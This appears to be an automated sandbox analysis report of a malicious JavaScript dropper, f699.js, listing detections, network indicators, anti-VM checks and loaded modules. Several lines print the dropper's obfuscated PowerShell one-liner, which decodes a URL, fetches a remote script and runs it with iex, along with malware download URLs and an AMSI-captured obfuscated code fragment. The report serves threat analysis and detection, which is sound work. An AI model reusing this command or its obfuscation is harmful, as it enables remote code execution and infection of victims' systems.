Windows Analysis Report
f699.js

Overview

General Information

Sample name: f699.js
Analysis ID: 1416950
MD5: 1e8ca7d25ee56d99775b19057e4b6d4c
SHA1: faac5ed0ade48c88814f3cd8f573406f7a5931d7
SHA256: f699b87dd723fe073c813f7b503a6012254d5da5702376caab7cc25dbae543f2

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Creates processes via WMI
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: https://temp.sh/bfseS/ruzxs.exe Avira URL Cloud: Label: malware
Source: https://temp.sh/bfseS/ruzxs.exe Virustotal: Detection: 9%
Source: f699.js Virustotal: Detection: 8%
Source: unknown HTTPS traffic detected: 51.91.79.17:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbZC source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbI source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb)f source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.1755950559.000001B32C35D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *n.pdb source: powershell.exe, 00000002.00000002.1756422832.000001B32DD91000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdb-g source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.1755950559.000001B32C35D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Traffic Snort IDS: 2856553 ETPRO TROJAN TA582 Domain in DNS Lookup 192.168.2.4:65392 -> 1.1.1.1:53
Source: global traffic HTTP traffic detected: GET /bfseS/ruzxs.exe HTTP/1.1 | Host: temp.sh | Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 51.91.79.17
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected: GET /1.php?s=mints1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: isyzgez.top | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: mknjddllgakhaje.top | Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: isyzgez.top
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUND | Server: nginx/1.18.0 (Ubuntu) | Date: Thu, 28 Mar 2024 09:32:34 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 14 | Connection: close
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://$m1o7nzq3c4ray05/$lytnxfpbkhsum2w.php?id=$env:computername&key=$mceotxshykj&s=mints1
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://isyzgez.top
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://isyzgez.top/1.php?s=mints1
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F719000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mknjddllgakhaje.top
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F719000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mknjddllgakhaje.top/oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1756548460.000001B32DE71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.1756548460.000001B32FBAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://temp.sh
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1800811353.000001B346500000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.c9t
Source: powershell.exe, 00000002.00000002.1756548460.000001B32DE71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1756548460.000001B32FB37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://temp.sh
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F9E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1756548460.000001B32F9D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://temp.sh/bfseS/ruzxs.exe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8BBFF6 2_2_00007FFD9B8BBFF6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8BCDA2 2_2_00007FFD9B8BCDA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8A0E8A 2_2_00007FFD9B8A0E8A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8B32A0 2_2_00007FFD9B8B32A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8B3570 2_2_00007FFD9B8B3570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B971576 2_2_00007FFD9B971576
Source: f699.js Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: classification engine Classification label: mal96.expl.evad.winJS@4/5@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3804:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iohiyljz.y21.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $eg6f5dmnzj0lbip.(([system.String]::new(@((8087-(67640680/(9188-(-4793+5547)))),(5997-5886),(10201-(4658+5431)),(-4512+(13879-(33091434/(8000-4421)))),(2038-1954),(909312/8192)))))( $4b7iqngl0fm3zt1 ) $eg6f5dmnzj0lbip.(([char[]]@((3528-3461),(8217-(59487624/7336)),(6501-(-2090+8480)),(4119-(13728-9724)),(-8905+9006)) -join ''))()$fu4ironpzhmjw2l.(([system.String]::new(@((216142/(8581160/(-3545+(53859400/(4076+4604))))),(499500/4625),(61827/557),(-2276+(-6344+8735)),(6194-(55757043/(66619280/7280)))))))()[byte[]] $f9woybdmlgz7nvr = $4b7iqngl0fm3zt1.((-join (@((664608/(847+(11904525/1685))),(-8954+9065),(503685/(14036-(14041-7754))),(-4671+4785),(639882/5613),(59267/(4002050/(1329+5221))),(568337/4697))| ForEach-Object { [char]$_ })))() $nha63b49uvzd1mt=$f9woybdmlgz7nvr return $nha63b49uvzd1mt}[System.Text.Encoding]::ascii.(([system.String]::new(@((124676/(-4260+(4704512/(-4489+(14854-9583))))),(410565/(-4545+(9172-(9630-9068)))),(303-187),(807258/(56887374/(11683-(29630886/(-613+(35910828/(-2159+8468))))))),(576636/(14293-(49173550/(20113575/(4938-(5916375/(3110+(256+(-295+2188))))))))),(556548/4882),(871080/8296),(797940/7254),(157178/1526)))))((3gb87m6det9axhcu5nfkjyiz02o "
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f699.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: f699.js Static file information: File size 1253522 > 1048576
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B78D2A5 pushad ; iretd 2_2_00007FFD9B78D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8A8162 push ebx; ret 2_2_00007FFD9B8A816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8B61D1 push eax; ret 2_2_00007FFD9B8B61DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB930EA push edx; iretd 2_2_00007FFD9BB930EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB944FA pushad ; retf 2_2_00007FFD9BB944FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BB94D0A push eax; ret 2_2_00007FFD9BB94D0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BC0D4E3 push eax; iretd 2_2_00007FFD9BC0D629
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BC0CFB3 push eax; iretd 2_2_00007FFD9BC0CFED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BC0CBAC push esi; retf 0000h 2_2_00007FFD9BC0CBB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BC0CBD8 push es; retf 2_2_00007FFD9BC0CBD9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9BC0CB92 push esi; retf 0000h 2_2_00007FFD9BC0CBA9

Persistence and Installation Behavior

Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3689
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6189
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496 Thread sleep count: 3689 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192 Thread sleep count: 6189 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196 Thread sleep time: -8301034833169293s >= -30000s
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware(
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E98B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine(
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1756548460.000001B32E98B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "VMware"
Source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E98B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E98B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000002.00000002.1800811353.000001B34652C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F38B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
